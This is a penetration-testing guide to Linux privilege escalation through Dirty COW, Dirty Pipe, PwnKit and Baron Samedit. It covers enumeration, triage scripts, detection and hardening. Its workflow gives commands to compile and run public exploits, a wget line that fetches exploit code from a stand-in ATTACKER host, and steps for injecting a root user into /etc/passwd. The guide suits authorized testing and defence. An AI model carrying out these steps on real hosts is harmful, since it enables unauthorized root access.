
Linux Kernel Exploits
Guide to identifying and exploiting Linux kernel vulnerabilities for privilege escalation, including enumeration techniques, common exploits, and safety considerations.
Introduction
Kernel exploits target vulnerabilities in the Linux kernel itself, providing a direct path to root privileges. While other privilege escalation techniques exploit misconfigurations, kernel exploits leverage actual software vulnerabilities in the most privileged code on the system.
Use With Caution
Kernel exploits carry significant risk:
- System crashes - Failed exploits can cause kernel panics
- Data corruption - Memory corruption can damage filesystems
- Detection - Kernel crashes generate obvious alerts
- Instability - Even successful exploits may leave systems unstable
Always get explicit permission before using kernel exploits, and prefer other escalation methods when available.
Enumeration
System Information
```bash
# Kernel version
uname -a
Linux target 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
# Kernel release only (the string exploit suggesters expect)
uname -r
# OS release
cat /etc/os-release
cat /etc/lsb-release
# Architecture
uname -m
arch
```
Record the whole string, not just the upstream version. Distributions backport kernel fixes without changing the upstream number, so the distribution build (`-116` and `#140-Ubuntu` above) and the build date decide whether a public exploit for "4.4.x" still applies.
Automated Enumeration
```bash
# Linux Exploit Suggester (on the target, or offline on the attacker box with the target's uname string)
./linux-exploit-suggester.sh
./linux-exploit-suggester.sh --uname "$(uname -a)"
# Linux Exploit Suggester 2
python linux-exploit-suggester-2.py
# LinPEAS kernel section
./linpeas.sh | grep -A 20 "Kernel"
```
Treat suggester output as a list of candidates: the tools match on version strings and cannot see backported fixes, so confirm each hit against the distribution's package changelog before compiling anything.
Finding Exploits
Manual Search
```bash
# Search Exploit-DB
searchsploit linux kernel 4.4 privilege escalation
# Search by specific version
searchsploit linux kernel 4.4.0
# Show the local path of a result so its header comments can be read before compiling
searchsploit -p 40839
```
Common Resources
| Resource | URL |
|---|---|
| Exploit-DB | https://www.exploit-db.com |
| Linux Exploit Suggester | https://github.com/mzet-/linux-exploit-suggester |
| CVE Details | https://www.cvedetails.com |
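The version ranges this page quotes for Dirty COW, Dirty Pipe and Baron Samedit can be checked mechanically before any exploit code is pulled onto the target. The script below is an added example, not part of the original page or of the tools listed above; it assumes GNU coreutils (`sort -V`), and it goes one step beyond a plain range test by excluding the 5.10 and 5.15 stable kernels that carry the Dirty Pipe fix. A match is still only a candidate: Ubuntu backported the Dirty COW fix to its 4.4 series in October 2016, so the 4.4.0-116 kernel in the enumeration output above matches on version but is patched.

```shell
#!/bin/sh
# Added example: triage a `uname -r` / `sudo -V` string against the
# "Affected" ranges quoted on this page. Needs GNU coreutils (sort -V).
# A hit is a candidate only: distributions backport fixes without changing
# the upstream version, so confirm against the package changelog.

# ver_norm RELEASE: drop the distro suffix, "4.4.0-116-generic" -> "4.4.0".
ver_norm() {
    printf '%s\n' "$1" | sed 's/[-+_ ].*$//'
}

# ver_le A B: true if A <= B in version-sort order ("1.8.31" < "1.8.31p2" < "1.8.32").
ver_le() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# ver_in_range V LOW HIGH: true if LOW <= V <= HIGH.
ver_in_range() {
    ver_le "$2" "$1" && ver_le "$1" "$3"
}

# dirty_pipe_backported V: the 5.10 and 5.15 stable branches carry the
# Dirty Pipe fix from 5.10.102 and 5.15.25, which a plain range test misses.
dirty_pipe_backported() {
    case "$1" in
        5.10.*) ver_le 5.10.102 "$1" ;;
        5.15.*) ver_le 5.15.25 "$1" ;;
        *) false ;;
    esac
}

# triage_kernel RELEASE: print candidate kernel CVEs for a uname -r string.
triage_kernel() (
    v=$(ver_norm "$1")
    if ver_in_range "$v" 2.6.22 4.8.3; then
        echo "CVE-2016-5195 Dirty COW: $v within 2.6.22-4.8.3 (searchsploit -m 40839)"
    fi
    if ver_in_range "$v" 5.8 5.16.11; then
        if dirty_pipe_backported "$v"; then
            echo "CVE-2022-0847 Dirty Pipe: $v matches 5.8-5.16.11 but this stable branch carries the fix"
        else
            echo "CVE-2022-0847 Dirty Pipe: $v within 5.8-5.16.11"
        fi
    fi
)

# sudo_vulnerable VERSION: Baron Samedit ranges, e.g. "1.8.31" from `sudo -V`.
sudo_vulnerable() {
    ver_in_range "$1" 1.8.2 1.8.31p2 || ver_in_range "$1" 1.9.0 1.9.5p1
}

# triage_host: run everything against the machine this executes on.
triage_host() {
    echo "kernel: $(uname -r)"
    triage_kernel "$(uname -r)"
    sv=$(sudo -V 2>/dev/null | sed -n 's/^Sudo version //p')
    if [ -n "$sv" ] && sudo_vulnerable "$sv"; then
        echo "CVE-2021-3156 Baron Samedit: sudo $sv (confirm with: sudoedit -s /)"
    fi
    pk=$(command -v pkexec) && [ -u "$pk" ] && echo "pkexec is SUID at $pk: check for CVE-2021-4034"
    return 0
}

# Usage: sh triage.sh --host
case "${1:-}" in --host) triage_host ;; esac
```

Run it with `--host` on the target, or call `triage_kernel` with a string copied from `uname -r` when working offline. The `pkexec` line only reports that the binary is SUID; whether it is patched has to be checked against the package changelog, since PwnKit has no usable version boundary across distributions.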
Notable Kernel Exploits
Dirty COW (CVE-2016-5195)
Affected: Linux Kernel 2.6.22 - 4.8.3 (upstream; also fixed in the 4.7.9 and 4.4.26 stable releases and backported by the major distributions in October 2016)
Race condition in the copy-on-write handling of private mappings (a write through `/proc/self/mem` racing `madvise(MADV_DONTNEED)`), allowing a write to a read-only mapping of a file such as `/etc/passwd` or a SUID binary.
```bash
# Compile (dirty.c is Exploit-DB 40839; -lcrypt is for the crypt() call that hashes the new password)
gcc -pthread dirty.c -o dirty -lcrypt
# Run: adds a new UID 0 user to /etc/passwd, then `su` to it
./dirty
```
This variant backs up the original file to `/tmp/passwd.bak` and prints the restore command when it finishes; run it, because the injected line in `/etc/passwd` is both an artefact and an open backdoor.
Dirty Pipe (CVE-2022-0847)
Affected: Linux Kernel 5.8 - 5.16.11 (also fixed in 5.15.25 and 5.10.102, so a 5.10 or 5.15 kernel at or above those point releases is patched despite matching the range)
Uninitialised `PIPE_BUF_FLAG_CAN_MERGE` flag on pipe buffers after `splice()`, allowing any process that can read a file to write into the page cache for that file regardless of permissions. Constraints: the write cannot start at a page boundary, cannot cross a page boundary and cannot grow the file, so payloads are patched in at a fixed offset of an existing file.
```bash
# Compile (Max Kellermann's proof of concept: exploit TARGETFILE OFFSET DATA)
gcc exploit.c -o exploit
# Overwrite /etc/passwd from byte offset 1 with the contents of payload
./exploit /etc/passwd 1 "$(cat payload)"
```
Only the page cache changes: every process sees the new contents immediately, but the page is never written back to disk, so the change disappears when the page is evicted or the host reboots. Copy the original bytes first so they can be written back the same way once the root shell is obtained.
PwnKit (CVE-2021-4034)
Affected: Polkit (pkexec) on most Linux distributions; present since pkexec was introduced in 2009 and fixed in January 2022, so check the distribution's package changelog rather than the upstream version.
Out-of-bounds write in pkexec's argument handling when it is executed with an empty argv (argc == 0): the code reads argv[1], which is really envp[0], and writes a resolved path back over it, letting an attacker smuggle a GCONV_PATH environment variable past pkexec's SUID environment scrubbing.
This is a userland SUID bug rather than a kernel vulnerability, so it carries none of the kernel-panic risk discussed above; it is listed here because exploit suggesters report it alongside kernel CVEs and it is usually the first thing to try on an unpatched host.
```bash
# Check that pkexec is installed and SUID root
ls -l "$(command -v pkexec)"
# Compile and run
gcc pwnkit.c -o pwnkit
./pwnkit
```
Sudo Baron Samedit (CVE-2021-3156)
Affected: Sudo 1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1 (legacy and stable branches; fixed in 1.9.5p2)
Heap buffer overflow in sudo's argument unescaping: when invoked as `sudoedit -s`, an argument ending in a single backslash makes the unescaping code read and copy past the end of the argument into a heap buffer. Like PwnKit this is a userland SUID bug, not a kernel vulnerability, so a failed attempt crashes sudo rather than the host.
```bash
# Check vulnerability: a patched sudo prints its usage text,
# a vulnerable one complains that / is not a regular file
sudoedit -s /
# Crash test from the advisory (the original used a 65536-byte argument)
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# If it crashes, likely vulnerable
# Run exploit
./exploit
```
Public exploits depend on heap layout and target specific sudo builds and distributions, so compare the exploit's supported-version list with `sudo -V` before running it.
Exploitation Workflow
1. Identify Kernel Version
```bash
uname -r
4.4.0-116-generic
```
2. Search for Exploits
```bash
searchsploit linux kernel 4.4.0
# or
searchsploit "linux kernel 4.4" | grep -i "privilege"
```
A version match is a starting point, not a result. Ubuntu backported the Dirty COW fix to its 4.4 series in October 2016 (4.4.0-45), so the 4.4.0-116 kernel from step 1 matches the search but is not vulnerable to 40839; read the distribution changelog (`apt changelog linux-image-$(uname -r)`, or `/usr/share/doc/linux-image-*/changelog.Debian.gz`) before transferring anything.
3. Download and Transfer
```bash
# On attacker (40839 is the Dirty COW /etc/passwd exploit, dirty.c)
searchsploit -m 40839
python3 -m http.server 8000
# On target
wget http://ATTACKER:8000/40839.c
```
4. Compile
```bash
# Simple compilation
gcc exploit.c -o exploit
# With specific flags (check exploit comments)
gcc -pthread exploit.c -o exploit -lcrypt
```
5. Execute
```bash
./exploit
# id
uid=0(root) gid=0(root) groups=0(root)
```
Cross-Compilation
If the target lacks a compiler, build on the attacker box for the target's architecture and C library:
```bash
# On attacker (compile for target architecture; match `uname -m` from the target)
# For 64-bit target
gcc -m64 exploit.c -o exploit64
# For 32-bit target (needs gcc-multilib on the build host)
gcc -m32 exploit.c -o exploit32
# Static compilation (no library dependencies)
gcc -static exploit.c -o exploit
```
Architecture is only half of it. A dynamically linked binary built on a current distribution references glibc symbol versions newer than an old target has, and aborts at startup with `version 'GLIBC_2.34' not found` before any exploit code runs; `-static` avoids this, as does building in a container whose glibc is no newer than the target's. Check with `file exploit` and `ldd exploit` on the target. Many kernel exploits also hard-code offsets or depend on kernel-specific structures, so "compiles" does not mean "works" against a different build.
Safety Considerations
Before Running
- Backup critical data if possible
- Test in lab with matching kernel version
- Read the exploit code - understand what it does
- Check for safer alternatives (sudo, SUID, cron, etc.)
During Engagement
- Document kernel version before attempting
- Have recovery plan for system crashes
- Notify client of risks before running
- Avoid production systems if possible
Common Failure Modes
- Kernel panic - System crashes and needs a reboot; recoverable on a VM, possibly not on a physical host without a remote console
- Segmentation fault - Exploit failed: wrong kernel build, wrong offsets, or a mitigation (SMEP/SMAP, KASLR) the exploit does not handle
- Version 'GLIBC_x.y' not found - The binary was built against a newer C library than the target has; rebuild with -static or on an older host
- No effect - The fix was backported even though the version string matches
- Partial success - Elevated but unstable; work quickly and expect the host to need a reboot
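One failure mode above is avoidable before the binary ever reaches the target: a cross-compiled exploit that imports a glibc symbol version newer than the target's libc never runs at all. The snippet below is an added example, not from the page or from any exploit's README; it assumes binutils' `objdump` on the attacker box and `getconf` on the target, and compares the highest `GLIBC_` symbol version a binary imports with the target's glibc. The `objdump -T` sample embedded in it is constructed.

```shell
#!/bin/sh
# Added example: will this cross-compiled exploit load on the target's glibc?
# Attacker box:  binary_required_glibc ./exploit    -> e.g. 2.34
# Target:        target_glibc                       -> e.g. 2.31
# Then:          report 2.34 2.31

# required_glibc: read objdump -T output on stdin and print the highest
# GLIBC_x.y symbol version referenced, or "none" for a static binary.
required_glibc() {
    r=$(grep -o 'GLIBC_[0-9][0-9.]*' | sed 's/^GLIBC_//' | sort -V | tail -n 1)
    printf '%s\n' "${r:-none}"
}

# binary_required_glibc FILE: highest glibc symbol version FILE imports.
binary_required_glibc() {
    objdump -T "$1" 2>/dev/null | required_glibc
}

# target_glibc: glibc version of the host this runs on ("glibc 2.31" -> 2.31).
target_glibc() {
    getconf GNU_LIBC_VERSION | awk '{print $2}'
}

# will_load REQUIRED TARGET: true if TARGET glibc is at least REQUIRED.
will_load() {
    [ "$1" = none ] && return 0
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# report REQUIRED TARGET: human-readable verdict.
report() {
    if will_load "$1" "$2"; then
        echo "ok: needs glibc $1, target has $2"
    else
        echo "will NOT load: needs glibc $1, target has $2; rebuild with -static or on an older host"
    fi
}

# sample_objdump: constructed objdump -T output for a binary built on a
# glibc 2.34+ host (GLIBC_ABI_DT_RELR is deliberately not a version number).
sample_objdump() {
    cat <<'EOF'
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) printf
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.34) __libc_start_main
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.17) clock_gettime
0000000000000000  w   D  *UND*  0000000000000000  GLIBC_ABI_DT_RELR
EOF
}

# Usage: sh glibc_check.sh --demo
case "${1:-}" in
    --demo) report "$(sample_objdump | required_glibc)" 2.31 ;;
esac
```

`__libc_start_main@GLIBC_2.34` is the usual culprit: every binary built on a glibc 2.34 or newer host imports it, so anything compiled on a 2022-era distribution fails on a 2020-era target unless linked with `-static`.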
Detection and Forensics
Indicators
- Kernel crash logs in /var/log/kern.log (or `journalctl -k` on systemd hosts): oops and panic messages, and the `segfault at` lines the kernel logs when the exploit binary itself crashes
- Suspicious compiled binaries in /tmp, /dev/shm or /var/tmp, often next to the .c source they were built from
- Unusual process memory patterns
- Core dumps from crashes
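The indicators above can be collected with a few lines of shell, whether for a defender or for a tester checking what a failed attempt left behind. The script below is an added example and not part of the original page; the kern.log lines in it are constructed to look like a segfaulting exploit binary followed by a kernel oops, and the directories and sysctl names are the ones this page mentions. The sysctl check takes an optional root directory so it can be run against a fixture instead of /proc/sys.

```shell
#!/bin/sh
# Added example: hunt for the side effects of a kernel-exploit attempt.

# scan_kernlog: print stdin lines that indicate a crashed exploit binary
# (the kernel logs userland segfaults) or a kernel oops/panic.
scan_kernlog() {
    grep -E 'segfault at|BUG: |Oops:|Kernel panic|general protection fault|Call Trace:'
}

# sample_kernlog: constructed log lines, a failed exploit run followed by an oops.
sample_kernlog() {
    cat <<'EOF'
Feb 12 21:30:01 target kernel: [12345.678901] exploit[2311]: segfault at 0 ip 00005581b3a2c1f0 sp 00007ffd3c4a1b40 error 4 in exploit[5581b3a2b000+1000]
Feb 12 21:30:40 target kernel: [12384.000001] usb 1-1: new high-speed USB device number 3 using xhci_hcd
Feb 12 21:31:15 target kernel: [12419.112233] BUG: unable to handle kernel paging request at ffffffff81234567
Feb 12 21:31:15 target kernel: [12419.112240] Oops: 0002 [#1] SMP
Feb 12 21:31:15 target kernel: [12419.112300] Call Trace:
EOF
}

# is_elf FILE: true if FILE starts with the ELF magic.
is_elf() {
    [ "$(head -c 4 "$1" 2>/dev/null)" = "$(printf '\177ELF')" ]
}

# recent_elf_binaries DIR MINUTES: ELF files under DIR modified in the last
# MINUTES; compiled exploits usually land in /tmp, /dev/shm or /var/tmp.
recent_elf_binaries() (
    find "$1" -xdev -type f -mmin "-$2" 2>/dev/null | while IFS= read -r f; do
        if is_elf "$f"; then printf '%s\n' "$f"; fi
    done
    true
)

# check_hardening [SYSCTL_ROOT]: report the two sysctls from the Mitigation
# section; SYSCTL_ROOT defaults to /proc/sys and can point at a test fixture.
check_hardening() (
    root=${1:-/proc/sys}
    for want in kernel/dmesg_restrict=1 kernel/kptr_restrict=2; do
        key=${want%=*}; val=${want#*=}
        have=$(cat "$root/$key" 2>/dev/null || echo missing)
        if [ "$have" = "$val" ]; then
            echo "ok   $key=$have"
        else
            echo "WEAK $key=$have (recommended $val)"
        fi
    done
)

# Usage: sh hunt.sh --host
case "${1:-}" in
    --host)
        echo "== kern.log =="
        scan_kernlog < /var/log/kern.log 2>/dev/null || true
        echo "== fresh ELF files (last 24h) =="
        for d in /tmp /dev/shm /var/tmp; do recent_elf_binaries "$d" 1440; done
        echo "== hardening =="
        check_hardening ;;
esac
```

A `segfault at` line naming a binary in /tmp, followed minutes later by an oops, is the classic trace of someone iterating on a kernel exploit; on systemd hosts feed `journalctl -k --since -1d` into `scan_kernlog` instead of the file.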
Mitigation
```bash
# Check kernel version and patches (Debian/Ubuntu; use rpm -q kernel on RHEL-family systems)
apt list --installed | grep linux-image
# Apply security updates; the new kernel only takes effect after a reboot into it
apt update && apt upgrade
# Enable kernel hardening
# /etc/sysctl.conf (apply with sysctl -p)
kernel.dmesg_restrict = 1
kernel.kptr_restrict = 2
```
Patching is the only real fix. The two sysctls deny unprivileged users the kernel log and kernel pointer values that exploit suggesters and many exploits read to pick offsets; that raises the cost of an attack but does not remove the bug.
Related Resources
- Sudo Misconfigurations - Safer privilege escalation
- Linux Capabilities - Capability-based escalation
- Privileged Groups - Group-based escalation
References
MITRE ATT&CK Techniques
- T1068 - Exploitation for Privilege Escalation - Primary kernel exploitation technique
- T1014 - Rootkit - Post-exploitation kernel-level persistence
Vulnerabilities
- CVE-2016-5195 - Dirty COW - Race condition in copy-on-write
- CVE-2022-0847 - Dirty Pipe - Pipe buffer flag manipulation
- CVE-2021-4034 - PwnKit - Polkit pkexec vulnerability
- CVE-2021-3156 - Baron Samedit - Sudo heap overflow
Security Resources
- Linux Exploit Suggester - Kernel exploit enumeration tool
- Dirty COW - Original vulnerability page
- Dirty Pipe Explained - Technical writeup
- Exploit-DB - Exploit database